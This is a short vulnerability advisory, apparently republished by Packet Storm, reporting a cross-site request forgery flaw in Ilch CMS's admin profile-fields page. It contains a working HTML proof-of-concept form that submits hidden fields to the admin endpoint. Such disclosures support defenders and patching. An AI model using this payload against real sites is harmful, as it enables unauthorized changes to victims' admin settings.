Ilch CMS suffers from a cross site request forgery vulnerability.
6516a3c9a997c8ee3898b5c0d3fd7f6b447fded88fe4d794fb0562bf26b8a17c# Affected software: Ilch cms
# Type of vulnerability: csrf
# URL: http://www.ilch.de/
# Discovered by: Provensec
# Website: http://www.provensec.com
# Description: Ilch cms profile field csrf
# Proof of concept
http://demo.opensourcecms.com/ilch/admin.php?profilefields (online demo)
Above field was vulnerable to csrf vulnerability attacker was able to add
value to the field due to lack of csrf token
csrf poc:
<html>
<body>
<form action="
http://demo.opensourcecms.com/ilch/admin.php?profilefields" method="POST">
<input type="hidden" name="sid" value="" />
<input type="hidden" name="show" value="testvalue" />
<input type="hidden" name="func" value="1" />
<input type="hidden" name="sub" value="Eintragen" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
--
Best Regards,
*Ankit Bharathan.*
*Save Energy... Save Nature... Go Green...*
P *Consider the environment. Please don't print this e-mail unless
absolutely necessary.*
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed